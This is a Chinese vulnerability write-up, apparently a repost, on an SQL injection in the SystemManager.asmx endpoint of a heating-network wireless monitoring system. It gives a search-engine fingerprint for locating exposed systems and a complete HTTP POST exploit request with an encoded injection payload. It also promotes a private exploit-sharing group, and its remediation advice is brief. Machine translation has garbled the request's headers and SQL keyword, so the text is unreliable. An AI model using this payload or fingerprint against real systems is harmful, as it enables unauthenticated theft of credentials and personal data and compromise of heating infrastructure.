0x01 产品简介
热网无线监控系统采用无线通信技术,实现对热力管网各种参数的实时监控和数据分析,提高供热效率,降低能耗,保护管道,是先进的热力管网监控解决方案。网络安全。系统采用先进的传感器技术和无线通信技术,对热力管网内的温度、压力、流量等关键参数进行实时监测,并将数据发送至监测中心进行集中处理和分析。该系统快速检测管网异常,支持供热管理决策,提供供热系统智能、精细的管理。
0x02 漏洞概述
HotNet无线监控系统的SystemManager.asmx接口中存在一个SQL注入漏洞,可能允许未经身份验证的远程攻击者窃取数据库中的信息(包括管理员后端密码、站点用户的个人信息等)。即使拥有高权限,也可以向服务器写入木马,从而获得服务器系统的进一步权限。
0x03 搜索引擎
body=\’下载/HDPrintInstall.rar\’ || body=\’skins/login/images/btn_login.jpg\’
0x04 漏洞复现
POST /DataSrvs/SystemManager.asmx/UpdateWUT HTTP/1.1
Host:你的IP
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/108.0.5359.125 Safari/537.36
Accept-Encoding: gzip、deflate
接受: */*
接受语言: en-US;q=0.9,en;q=0.8
Content-Type: 应用程序/x-www-form-urlencoded
关闭连接:
id=%28SELECT+CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281675%3D1675%29+THEN+@@版本+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28113%29%29name=desc=
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
0x06 修复建议
关闭互联网暴露或访问界面设置
升级到安全版本
#【漏洞复现】以上关于热网无线监控系统SystemManager.asmx SQL注入漏洞的相关内容仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93236.html
